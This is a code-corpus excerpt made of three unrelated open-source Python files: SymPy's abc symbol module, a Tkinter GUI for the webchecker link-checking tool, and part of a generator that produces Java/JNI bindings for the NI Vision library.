bsd-3-clause
robertmattmueller/sdac-compiler
sympy/abc.py
30
1877
from __future__ import print_function, division import string from .core import Symbol from .core.alphabets import greeks from .core.compatibility import exec_ _latin = list(string.ascii_letters) # COSINEQ should not be imported as they clash; gamma, pi and zeta clash, too _greek = list(greeks) # make a copy, so we can mutate it # Note: We import lamda since lambda is a reserved keyword in Python _greek.remove("lambda") _greek.append("lamda") for _s in _latin + _greek: exec_("%s = Symbol('%s')" % (_s, _s)) def clashing(): """Return the clashing-symbols dictionaries. ``clash1`` defines all the single letter variables that clash with SymPy objects; ``clash2`` defines the multi-letter clashing symbols; and ``clash`` is the union of both. These can be passed for ``locals`` during sympification if one desires Symbols rather than the non-Symbol objects for those names. Examples ======== >>> from sympy import S >>> from sympy.abc import _clash1, _clash2, _clash >>> S("Q & C", locals=_clash1) And(C, Q) >>> S('pi(x)', locals=_clash2) pi(x) >>> S('pi(C, Q)', locals=_clash) pi(C, Q) Note: if changes are made to the docstring examples they can only be tested after removing "clashing" from the list of deleted items at the bottom of this file which removes this function from the namespace. """ ns = {} exec_('from sympy import *', ns) clash1 = {} clash2 = {} while ns: k, _ = ns.popitem() if k in _greek: clash2[k] = Symbol(k) _greek.remove(k) elif k in _latin: clash1[k] = Symbol(k) _latin.remove(k) clash = {} clash.update(clash1) clash.update(clash2) return clash1, clash2, clash _clash1, _clash2, _clash = clashing() del _latin, _greek, _s, clashing, Symbol
gpl-3.0
matmutant/sl4a
python/src/Tools/webchecker/wcgui.py
50
15272
#! /usr/bin/env python """GUI interface to webchecker. This works as a Grail applet too! E.g. <APPLET CODE=wcgui.py NAME=CheckerWindow></APPLET> Checkpoints are not (yet??? ever???) supported. User interface: Enter a root to check in the text entry box. To enter more than one root, enter them one at a time and press <Return> for each one. Command buttons Start, Stop and "Check one" govern the checking process in the obvious way. Start and "Check one" also enter the root from the text entry box if one is present. There's also a check box (enabled by default) to decide whether actually to follow external links (since this can slow the checking down considerably). Finally there's a Quit button. A series of checkbuttons determines whether the corresponding output panel is shown. List panels are also automatically shown or hidden when their status changes between empty to non-empty. There are six panels: Log -- raw output from the checker (-v, -q affect this) To check -- links discovered but not yet checked Checked -- links that have been checked Bad links -- links that failed upon checking Errors -- pages containing at least one bad link Details -- details about one URL; double click on a URL in any of the above list panels (not in Log) will show details for that URL Use your window manager's Close command to quit. Command line options: -m bytes -- skip HTML pages larger than this size (default %(MAXPAGE)d) -q -- quiet operation (also suppresses external links report) -v -- verbose operation; repeating -v will increase verbosity -t root -- specify root dir which should be treated as internal (can repeat) -a -- don't check name anchors Command line arguments: rooturl -- URL to start checking (default %(DEFROOT)s) XXX The command line options (-m, -q, -v) should be GUI accessible. XXX The roots should be visible as a list (?). XXX The multipanel user interface is clumsy. """ # ' Emacs bait import sys import getopt from Tkinter import * import tktools import webchecker # Override some for a weaker platform if sys.platform == 'mac': webchecker.DEFROOT = "http://grail.cnri.reston.va.us/" webchecker.MAXPAGE = 50000 webchecker.verbose = 4 def main(): try: opts, args = getopt.getopt(sys.argv[1:], 't:m:qva') except getopt.error, msg: sys.stdout = sys.stderr print msg print __doc__%vars(webchecker) sys.exit(2) webchecker.verbose = webchecker.VERBOSE webchecker.nonames = webchecker.NONAMES webchecker.maxpage = webchecker.MAXPAGE extra_roots = [] for o, a in opts: if o == '-m': webchecker.maxpage = int(a) if o == '-q': webchecker.verbose = 0 if o == '-v': webchecker.verbose = webchecker.verbose + 1 if o == '-t': extra_roots.append(a) if o == '-a': webchecker.nonames = not webchecker.nonames root = Tk(className='Webchecker') root.protocol("WM_DELETE_WINDOW", root.quit) c = CheckerWindow(root) c.setflags(verbose=webchecker.verbose, maxpage=webchecker.maxpage, nonames=webchecker.nonames) if args: for arg in args[:-1]: c.addroot(arg) c.suggestroot(args[-1]) # Usually conditioned on whether external links # will be checked, but since that's not a command # line option, just toss them in. for url_root in extra_roots: # Make sure it's terminated by a slash, # so that addroot doesn't discard the last # directory component. if url_root[-1] != "/": url_root = url_root + "/" c.addroot(url_root, add_to_do = 0) root.mainloop() class CheckerWindow(webchecker.Checker): def __init__(self, parent, root=webchecker.DEFROOT): self.__parent = parent self.__topcontrols = Frame(parent) self.__topcontrols.pack(side=TOP, fill=X) self.__label = Label(self.__topcontrols, text="Root URL:") self.__label.pack(side=LEFT) self.__rootentry = Entry(self.__topcontrols, width=60) self.__rootentry.pack(side=LEFT) self.__rootentry.bind('<Return>', self.enterroot) self.__rootentry.focus_set() self.__controls = Frame(parent) self.__controls.pack(side=TOP, fill=X) self.__running = 0 self.__start = Button(self.__controls, text="Run", command=self.start) self.__start.pack(side=LEFT) self.__stop = Button(self.__controls, text="Stop", command=self.stop, state=DISABLED) self.__stop.pack(side=LEFT) self.__step = Button(self.__controls, text="Check one", command=self.step) self.__step.pack(side=LEFT) self.__cv = BooleanVar(parent) self.__cv.set(self.checkext) self.__checkext = Checkbutton(self.__controls, variable=self.__cv, command=self.update_checkext, text="Check nonlocal links",) self.__checkext.pack(side=LEFT) self.__reset = Button(self.__controls, text="Start over", command=self.reset) self.__reset.pack(side=LEFT) if __name__ == '__main__': # No Quit button under Grail! self.__quit = Button(self.__controls, text="Quit", command=self.__parent.quit) self.__quit.pack(side=RIGHT) self.__status = Label(parent, text="Status: initial", anchor=W) self.__status.pack(side=TOP, fill=X) self.__checking = Label(parent, text="Idle", anchor=W) self.__checking.pack(side=TOP, fill=X) self.__mp = mp = MultiPanel(parent) sys.stdout = self.__log = LogPanel(mp, "Log") self.__todo = ListPanel(mp, "To check", self, self.showinfo) self.__done = ListPanel(mp, "Checked", self, self.showinfo) self.__bad = ListPanel(mp, "Bad links", self, self.showinfo) self.__errors = ListPanel(mp, "Pages w/ bad links", self, self.showinfo) self.__details = LogPanel(mp, "Details") self.root_seed = None webchecker.Checker.__init__(self) if root: root = str(root).strip() if root: self.suggestroot(root) self.newstatus() def reset(self): webchecker.Checker.reset(self) for p in self.__todo, self.__done, self.__bad, self.__errors: p.clear() if self.root_seed: self.suggestroot(self.root_seed) def suggestroot(self, root): self.__rootentry.delete(0, END) self.__rootentry.insert(END, root) self.__rootentry.select_range(0, END) self.root_seed = root def enterroot(self, event=None): root = self.__rootentry.get() root = root.strip() if root: self.__checking.config(text="Adding root "+root) self.__checking.update_idletasks() self.addroot(root) self.__checking.config(text="Idle") try: i = self.__todo.items.index(root) except (ValueError, IndexError): pass else: self.__todo.list.select_clear(0, END) self.__todo.list.select_set(i) self.__todo.list.yview(i) self.__rootentry.delete(0, END) def start(self): self.__start.config(state=DISABLED, relief=SUNKEN) self.__stop.config(state=NORMAL) self.__step.config(state=DISABLED) self.enterroot() self.__running = 1 self.go() def stop(self): self.__stop.config(state=DISABLED, relief=SUNKEN) self.__running = 0 def step(self): self.__start.config(state=DISABLED) self.__step.config(state=DISABLED, relief=SUNKEN) self.enterroot() self.__running = 0 self.dosomething() def go(self): if self.__running: self.__parent.after_idle(self.dosomething) else: self.__checking.config(text="Idle") self.__start.config(state=NORMAL, relief=RAISED) self.__stop.config(state=DISABLED, relief=RAISED) self.__step.config(state=NORMAL, relief=RAISED) __busy = 0 def dosomething(self): if self.__busy: return self.__busy = 1 if self.todo: l = self.__todo.selectedindices() if l: i = l[0] else: i = 0 self.__todo.list.select_set(i) self.__todo.list.yview(i) url = self.__todo.items[i] self.__checking.config(text="Checking "+self.format_url(url)) self.__parent.update() self.dopage(url) else: self.stop() self.__busy = 0 self.go() def showinfo(self, url): d = self.__details d.clear() d.put("URL: %s\n" % self.format_url(url)) if self.bad.has_key(url): d.put("Error: %s\n" % str(self.bad[url])) if url in self.roots: d.put("Note: This is a root URL\n") if self.done.has_key(url): d.put("Status: checked\n") o = self.done[url] elif self.todo.has_key(url): d.put("Status: to check\n") o = self.todo[url] else: d.put("Status: unknown (!)\n") o = [] if (not url[1]) and self.errors.has_key(url[0]): d.put("Bad links from this page:\n") for triple in self.errors[url[0]]: link, rawlink, msg = triple d.put(" HREF %s" % self.format_url(link)) if self.format_url(link) != rawlink: d.put(" (%s)" %rawlink) d.put("\n") d.put(" error %s\n" % str(msg)) self.__mp.showpanel("Details") for source, rawlink in o: d.put("Origin: %s" % source) if rawlink != self.format_url(url): d.put(" (%s)" % rawlink) d.put("\n") d.text.yview("1.0") def setbad(self, url, msg): webchecker.Checker.setbad(self, url, msg) self.__bad.insert(url) self.newstatus() def setgood(self, url): webchecker.Checker.setgood(self, url) self.__bad.remove(url) self.newstatus() def newlink(self, url, origin): webchecker.Checker.newlink(self, url, origin) if self.done.has_key(url): self.__done.insert(url) elif self.todo.has_key(url): self.__todo.insert(url) self.newstatus() def markdone(self, url): webchecker.Checker.markdone(self, url) self.__done.insert(url) self.__todo.remove(url) self.newstatus() def seterror(self, url, triple): webchecker.Checker.seterror(self, url, triple) self.__errors.insert((url, '')) self.newstatus() def newstatus(self): self.__status.config(text="Status: "+self.status()) self.__parent.update() def update_checkext(self): self.checkext = self.__cv.get() class ListPanel: def __init__(self, mp, name, checker, showinfo=None): self.mp = mp self.name = name self.showinfo = showinfo self.checker = checker self.panel = mp.addpanel(name) self.list, self.frame = tktools.make_list_box( self.panel, width=60, height=5) self.list.config(exportselection=0) if showinfo: self.list.bind('<Double-Button-1>', self.doubleclick) self.items = [] def clear(self): self.items = [] self.list.delete(0, END) self.mp.hidepanel(self.name) def doubleclick(self, event): l = self.selectedindices() if l: self.showinfo(self.items[l[0]]) def selectedindices(self): l = self.list.curselection() if not l: return [] return map(int, l) def insert(self, url): if url not in self.items: if not self.items: self.mp.showpanel(self.name) # (I tried sorting alphabetically, but the display is too jumpy) i = len(self.items) self.list.insert(i, self.checker.format_url(url)) self.list.yview(i) self.items.insert(i, url) def remove(self, url): try: i = self.items.index(url) except (ValueError, IndexError): pass else: was_selected = i in self.selectedindices() self.list.delete(i) del self.items[i] if not self.items: self.mp.hidepanel(self.name) elif was_selected: if i >= len(self.items): i = len(self.items) - 1 self.list.select_set(i) class LogPanel: def __init__(self, mp, name): self.mp = mp self.name = name self.panel = mp.addpanel(name) self.text, self.frame = tktools.make_text_box(self.panel, height=10) self.text.config(wrap=NONE) def clear(self): self.text.delete("1.0", END) self.text.yview("1.0") def put(self, s): self.text.insert(END, s) if '\n' in s: self.text.yview(END) def write(self, s): self.text.insert(END, s) if '\n' in s: self.text.yview(END) self.panel.update() class MultiPanel: def __init__(self, parent): self.parent = parent self.frame = Frame(self.parent) self.frame.pack(expand=1, fill=BOTH) self.topframe = Frame(self.frame, borderwidth=2, relief=RAISED) self.topframe.pack(fill=X) self.botframe = Frame(self.frame) self.botframe.pack(expand=1, fill=BOTH) self.panelnames = [] self.panels = {} def addpanel(self, name, on=0): v = StringVar(self.parent) if on: v.set(name) else: v.set("") check = Checkbutton(self.topframe, text=name, offvalue="", onvalue=name, variable=v, command=self.checkpanel) check.pack(side=LEFT) panel = Frame(self.botframe) label = Label(panel, text=name, borderwidth=2, relief=RAISED, anchor=W) label.pack(side=TOP, fill=X) t = v, check, panel self.panelnames.append(name) self.panels[name] = t if on: panel.pack(expand=1, fill=BOTH) return panel def showpanel(self, name): v, check, panel = self.panels[name] v.set(name) panel.pack(expand=1, fill=BOTH) def hidepanel(self, name): v, check, panel = self.panels[name] v.set("") panel.pack_forget() def checkpanel(self): for name in self.panelnames: v, check, panel = self.panels[name] panel.pack_forget() for name in self.panelnames: v, check, panel = self.panels[name] if v.get(): panel.pack(expand=1, fill=BOTH) if __name__ == '__main__': main()
apache-2.0
Kevin-OConnor/allwpilib
wpilibj/src/athena/cpp/nivision/gen_java.py
3
80172
from __future__ import print_function import codecs import os import sys try: import configparser except ImportError: import ConfigParser as configparser from nivision_parse import * # base, cast-out-pre, cast-out-post, cast-in-pre, cast-in-post java_accessor_map = { "B": ("", "", "", "", ""), "C": ("Char", "", "", "", ""), "S": ("Short", "", "", "", ""), "I": ("Int", "", "", "", ""), "J": ("Long", "", "", "", ""), "F": ("Float", "", "", "", ""), "D": ("Double", "", "", "", ""), "Z": ("Boolean", "", "", "", ""), "X": ("", "(short)(", " & 0xff)", "(byte)(", " & 0xff)"), "Y": ("Short", "(int)(", " & 0xffff)", "(short)(", " & 0xffff)"), } java_size_map = { "B": 1, "C": 2, "S": 2, "I": 4, "J": 8, "F": 4, "D": 8, "Z": 1, } class JavaType: def __init__(self, j_type, jn_type, jni_type, jni_sig, is_enum=False, is_struct=False, is_opaque=False, string_array=False, array_size=None): self.j_type = j_type self.jn_type = jn_type self.jni_type = jni_type self.jni_sig = jni_sig self.is_enum = is_enum self.is_struct = is_struct self.is_opaque = is_opaque self.string_array = string_array self.array_size = array_size def copy(self): return JavaType(self.j_type, self.jn_type, self.jni_type, self.jni_sig, is_enum=self.is_enum, is_struct=self.is_struct, is_opaque=self.is_opaque, string_array=self.string_array, array_size=self.array_size) def __repr__(self): return "JavaType(%s, %s, %s, %s, is_enum=%s, is_struct=%s, is_opaque=%s, string_array=%s, array_size=%s)" % ( self.j_type, self.jn_type, self.jni_type, self.jni_sig, self.is_enum, self.is_struct, self.is_opaque, self.string_array, self.array_size) java_types_map = { ("void", None): JavaType("void", "void", "void", None), ("env", None): JavaType("", "", "JNIEnv*", None), ("cls", None): JavaType("", "", "jclass", None), ("int", None): JavaType("int", "int", "jint", "I"), ("char", None): JavaType("byte", "byte", "jbyte", "B"), ("wchar_t", None): JavaType("char", "char", "jchar", "C"), ("unsigned char", None): JavaType("short", "short", "jshort", "X"), ("short", None): JavaType("short", "short", "jshort", "S"), ("unsigned short", None): JavaType("int", "int", "jint", "Y"), ("unsigned", None): JavaType("int", "int", "jint", "I"), ("unsigned int", None): JavaType("int", "int", "jint", "I"), ("uInt32", None): JavaType("int", "int", "jint", "I"), ("IMAQdxSession", None): JavaType("int", "int", "jint", "I"), ("bool32", None): JavaType("int", "int", "jint", "I"), ("long", None): JavaType("long", "long", "jlong", "J"), ("unsigned long", None): JavaType("long", "long", "jlong", "J"), ("__int64", None): JavaType("long", "long", "jlong", "J"), ("long long", None): JavaType("long", "long", "jlong", "J"), ("unsigned __int64", None): JavaType("long", "long", "jlong", "J"), ("__uint64", None): JavaType("long", "long", "jlong", "J"), ("unsigned long long", None): JavaType("long", "long", "jlong", "J"), ("float", None): JavaType("float", "float", "jfloat", "F"), ("double", None): JavaType("double", "double", "jdouble", "D"), ("long double", None): JavaType("double", "double", "jdouble", "D"), ("unsigned char*", None): JavaType("String", "String", "jstring", "Ljava/lang/String;"), ("char*", None): JavaType("String", "String", "jstring", "Ljava/lang/String;"), ("void*", None): JavaType("RawData", "long", "jlong", "J", is_opaque=True), # ("size_t", None): JavaType("long", "long", "jlong", "J"), ("String255", None): JavaType("String", "String", "jstring", "Ljava/lang/String;", string_array=True, array_size="256"), ("String255", ""): JavaType("String[]", "String[]", "jstringArray", "[Ljava/lang/String;", string_array=True, array_size="256"), ("char*", ""): JavaType("String[]", "String[]", "jstringArray", "[Ljava/lang/String;"), ("char", ""): JavaType("String", "String", "jstring", "Ljava/lang/String;", string_array=True, array_size=""), ("unsigned char", ""): JavaType("byte[]", "byte[]", "jbyteArray", "[B"), ("short", ""): JavaType("short[]", "short[]", "jshortArray", "[S"), ("int", ""): JavaType("int[]", "int[]", "jintArray", "[I"), ("unsigned int", ""): JavaType("int[]", "int[]", "jintArray", "[I"), ("uInt32", ""): JavaType("int[]", "int[]", "jintArray", "[I"), ("long", ""): JavaType("long[]", "long[]", "jlongArray", "[J"), ("float", ""): JavaType("float[]", "float[]", "jfloatArray", "[F"), ("double", ""): JavaType("double[]", "double[]", "jdoubleArray", "[D"), } def c_to_jtype(name, arr): jtype = java_types_map.get((name, arr), None) if jtype is not None: return jtype # sized array is treated the same as unsized if arr is not None and arr != "": jtype = c_to_jtype(name, "").copy() jtype.array_size = arr java_types_map[(name, arr)] = jtype # cache return jtype # Opaque structures if name in opaque_structs: if arr is None: jtype = JavaType(name, "long", "jlong", "J", is_opaque=True) else: # FIXME jtype = JavaType(name + "[]", "long[]", "jlongArray", "[J", is_opaque=True) java_types_map[(name, arr)] = jtype # cache return jtype # Enums if name in enums: if arr is None: jtype = JavaType(name, "int", "jint", "I", is_enum=True) else: # FIXME jtype = JavaType(name + "[]", "int[]", "jintArray", "[I", is_enum=True) java_types_map[(name, arr)] = jtype # cache return jtype # handle pointers as void* (FIXME) if name[-1] == '*': if name[:-1] not in structs and name[:-1] not in defined: return java_types_map[("void*", None)] return c_to_jtype(name[:-1], arr) # Otherwise it's a normal structure object if arr is None: jtype = JavaType(name, "long", "jlong", "J", is_struct=True) else: # FIXME jtype = JavaType(name + "[]", "long[]", "jlongArray", "[J", is_struct=True) java_types_map[(name, arr)] = jtype return jtype class JavaEmitData: def __init__(self): self.construct = [] self.backingRead = [] self.read = [] self.writeBufs = [] self.write = [] self.backingWrite = [] self.toArg = "" def addConstruct(self, s): self.construct.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addBackingRead(self, s): self.backingRead.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addRead(self, s): self.read.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addWriteBuf(self, s): self.writeBufs.append(s) def addWrite(self, s): self.write.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) def addBackingWrite(self, s): self.backingWrite.extend(s.split('\n')[1 if s[0] == '\n' else 0:]) class JavaEmitArrayData(JavaEmitData): def __init__(self): JavaEmitData.__init__(self) self.addConstruct("{fname} = new {ftype_one}[0];") self.addBackingRead("int {size_fname} = {backing}.get{jaccessor}({size_foffset});") self.addBackingWrite("{backing}.put{jaccessor}({size_foffset}, {fname}.length);") # sized array of null-terminated strings strzArrayEmitSized = JavaEmitArrayData() strzArrayEmitSized.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzArrayEmitSized.addRead(""" {fname} = new String[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{pointer_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {pointer_sz}) {{ long addr = getPointer(bb, off); if (addr == 0) {fname}[i] = null; else {{ ByteBuffer bb2 = newDirectByteBuffer(addr, 1000); // FIXME while (bb2.get() != 0) {{}} byte[] bytes = new byte[bb2.position()-1]; bb2.rewind(); getBytes(bb2, bytes, 0, bytes.length); try {{ {fname}[i] = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }} }}""") strzArrayEmitSized.addWriteBuf("{buftype} {fname}_buf") strzArrayEmitSized.addWriteBuf("{buftype}[] {fname}_bufs") strzArrayEmitSized.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ if ({fname}[i] == null) putPointer({fname}_buf, off, 0); else {{ byte[] bytes; try {{ bytes = {fname}[i].getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} {fname}_bufs[i] = ByteBuffer.allocateDirect(bytes.length+1); putBytes({fname}_bufs[i], bytes, 0, bytes.length).put(bytes.length, (byte)0); putPointer({fname}_buf, off, getByteBufferAddress({fname}_bufs[i])); }} }}""") strzArrayEmitSized.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") # unsized array; final terminating zero determines the length strzArrayEmitUnsized = JavaEmitData() strzArrayEmitUnsized.addConstruct("{fname} = new {ftype_one}[0];") strzArrayEmitUnsized.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzArrayEmitUnsized.addRead(""" {{ if ({fname}_addr == 0) {fname} = new {ftype_one}[0]; else {{ // prescan to find length ByteBuffer bb = newDirectByteBuffer({fname}_addr, 1000*{pointer_sz}); // FIXME int size = 0; for (int off=0; getPointer(bb, off) != 0; size++, off += {pointer_sz}) {{ }} {fname} = new String[size]; for (int i=0, off=0; i<size; i++, off += {pointer_sz}) {{ long addr = getPointer(bb, off); if (addr == 0) {fname}[i] = null; else {{ ByteBuffer bb2 = newDirectByteBuffer(addr, 1000); // FIXME while (bb2.get() != 0) {{}} byte[] bytes = new byte[bb2.position()-1]; bb2.rewind(); getBytes(bb2, 0, bytes.length); try {{ {fname}[i] = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }} }} }}""") strzArrayEmitUnsized.addWriteBuf("{buftype} {fname}_buf") strzArrayEmitUnsized.addWriteBuf("{buftype}[] {fname}_bufs") strzArrayEmitUnsized.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect(({fname}.length+1)*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ if ({fname}[i] == null) putPointer({fname}_buf, off, 0); else {{ byte[] bytes; try {{ bytes = {fname}[i].getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} {fname}_bufs[i] = ByteBuffer.allocateDirect(bytes.length+1); putBytes({fname}_bufs[i], bytes, 0, bytes.length).put(bytes.length, (byte)0); putPointer({fname}_buf, off, getByteBufferAddress({fname}_bufs[i])); }} }} putPointer({fname}_buf, {fname}.length*{pointer_sz}, 0); // terminator""") strzArrayEmitUnsized.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") # array of enum values enumArrayEmit = JavaEmitArrayData() enumArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") enumArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*%d); for (int i=0, off=0; i<{size_fname}; i++, off += %d) {{ {fname}[i] = {ftype_one}.fromValue(bb.getInt(off)); }} }}""" % (4, 4)) enumArrayEmit.addWriteBuf("{buftype} {fname}_buf") enumArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*%d).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += %d) {{ if ({fname} != null) {fname}_buf.putInt(off, {fname}[i].getValue()); }}""" % (4, 4)) enumArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") enumArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of opaque structures opaqueArrayEmit = JavaEmitArrayData() opaqueArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") opaqueArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{pointer_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {pointer_sz}) {{ {fname}[i] = new {ftype_one}(getPointer(bb, off), false); }} }}""") opaqueArrayEmit.addWriteBuf("{buftype} {fname}_buf") opaqueArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{pointer_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {pointer_sz}) {{ putPointer({fname}_buf, off, {fname}[i]); }}""") opaqueArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") opaqueArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of String255 string255ArrayEmit = JavaEmitArrayData() string255ArrayEmit.addBackingRead(""" {fname} = new String[{size_fname}]; if ({size_fname} > 0) {{ byte[] bytes = new byte[%d]; int len; for (int i=0, off={foffset}; i<{size_fname}; i++, off += %d) {{ getBytes({backing}, bytes, off, %d); for (len=0; len<bytes.length && bytes[len] != 0; len++) {{}} try {{ {fname}[i] = new String(bytes, 0, len, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}[i] = ""; }} }} }}""" % (256, 256, 256)) string255ArrayEmit.addBackingWrite(""" for (int i=0, off={foffset}; i<{size_fname}; i++, off += %d) {{ byte[] bytes; try {{ bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} putBytes({backing}, bytes, off, bytes.length); for (int i=bytes.length; i<%d; i++) {backing}.put(off+i, (byte)0); // fill with zero }}""" % (256, 256)) # array of normal structures structArrayEmit = JavaEmitArrayData() structArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") structArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, {size_fname}*{struct_sz}); for (int i=0, off=0; i<{size_fname}; i++, off += {struct_sz}) {{ {fname}[i] = new {ftype_one}(bb, off); {fname}[i].read(); }} }}""") structArrayEmit.addWriteBuf("{buftype} {fname}_buf") # FIXME: This can be optimized for the read->write case. structArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{struct_sz}).order(ByteOrder.nativeOrder()); for (int i=0, off=0; i<{fname}.length; i++, off += {struct_sz}) {{ {fname}[i].setBuffer({fname}_buf, off); {fname}[i].write(); }}""") structArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") structArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of bytes byteArrayEmit = JavaEmitArrayData() byteArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") byteArrayEmit.addRead(""" {fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ getBytes(newDirectByteBuffer({fname}_addr, {size_fname}), {fname}, 0, {size_fname}); }}""") byteArrayEmit.addWriteBuf("{buftype} {fname}_buf") byteArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length); putBytes({fname}_buf, {fname}, 0, {fname}.length);""") byteArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") byteArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # array of java types jtypeArrayEmit = JavaEmitArrayData() jtypeArrayEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") jtypeArrayEmit.addRead("""{fname} = new {ftype_one}[{size_fname}]; if ({size_fname} > 0 && {fname}_addr != 0) {{ newDirectByteBuffer({fname}_addr, {size_fname}*{struct_sz}).as{buftype}().get({fname}); }}""") jtypeArrayEmit.addWriteBuf("ByteBuffer {fname}_buf") jtypeArrayEmit.addWrite(""" {fname}_buf = ByteBuffer.allocateDirect({fname}.length*{struct_sz}).order(ByteOrder.nativeOrder()); {fname}_buf.as{buftype}().put({fname}).rewind();""") jtypeArrayEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname}_buf);") jtypeArrayEmit.toArg = "getByteBufferAddress({fname}_buf)" # enum enumEmit = JavaEmitData() enumEmit.addBackingRead("{fname} = {ftype}.fromValue({backing}.getInt({foffset}));") enumEmit.addBackingWrite("""if ({fname} != null) {backing}.putInt({foffset}, {fname}.getValue());""") enumEmit.toArg = "{fname}.getValue()" # opaque structure opaqueEmit = JavaEmitData() opaqueEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") opaqueEmit.addRead("""if ({fname}_addr == 0) {fname} = null; else {fname} = new {ftype}({fname}_addr, false);""") opaqueEmit.addBackingWrite("putPointer({backing}, {foffset}, {fname});") opaqueEmit.toArg = "{fname}.getAddress()" # inline normal structure structEmit = JavaEmitData() structEmit.addConstruct("{fname} = new {ftype}({backing}, {foffset});") structEmit.addRead("{fname}.read();") structEmit.addWrite("{fname}.write();") structEmit.toArg = "{fname}.getAddress()" # java type jtypeEmit = JavaEmitData() jtypeEmit.addBackingRead( "{fname} = {jaccessor_cast_out_pre}{backing}.get{jaccessor}({foffset}){jaccessor_cast_out_post};") jtypeEmit.addBackingWrite( "{backing}.put{jaccessor}({foffset}, {jaccessor_cast_in_pre}{fname}{jaccessor_cast_in_post});") # string - array of characters strSizedEmit = JavaEmitData() strSizedEmit.addBackingRead("""{{ byte[] bytes = new byte[{array_size}]; getBytes({backing}, bytes, {foffset}, {array_size}); int len; for (len=0; len<bytes.length && bytes[len] != 0; len++) {{}} try {{ {fname} = new String(bytes, 0, len, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname} = ""; }} }}""") strSizedEmit.addBackingWrite(""" if ({fname} != null) {{ byte[] bytes; try {{ bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ bytes = new byte[0]; }} putBytes({backing}, bytes, {foffset}, bytes.length); for (int i=bytes.length; i<{array_size}; i++) {backing}.put(i, (byte)0); // fill with zero }}""") # null terminated string strzEmit = JavaEmitData() strzEmit.addBackingRead("long {fname}_addr = getPointer({backing}, {foffset});") strzEmit.addRead("""if ({fname}_addr == 0) {fname} = null; else {{ ByteBuffer bb = newDirectByteBuffer({fname}_addr, 1000); // FIXME while (bb.get() != 0) {{}} byte[] bytes = new byte[bb.position()-1]; getBytes(bb, bytes, 0, bytes.length); try {{ {fname} = new String(bytes, "UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname} = ""; }} }} """) strzEmit.addWriteBuf("{buftype} {fname}_buf") strzEmit.addWrite(""" if ({fname} != null) {{ byte[] {fname}_bytes; try {{ {fname}_bytes = {fname}.getBytes("UTF-8"); }} catch (UnsupportedEncodingException e) {{ {fname}_bytes = new byte[0]; }} {fname}_buf = ByteBuffer.allocateDirect({fname}_bytes.length+1); putBytes({fname}_buf, {fname}_bytes, 0, {fname}_bytes.length).put({fname}_bytes.length, (byte)0); }}""") strzEmit.addBackingWrite( "putPointer({backing}, {foffset}, {fname} == null ? 0 : getByteBufferAddress({fname}_buf));") strzEmit.toArg = "{fname} == null ? 0 : getByteBufferAddress({fname}_buf)" class JavaStructEmitHelper: def __init__(self, emit, name, fields, sized_members=None): self.emit = emit self.name = name self.fields = fields 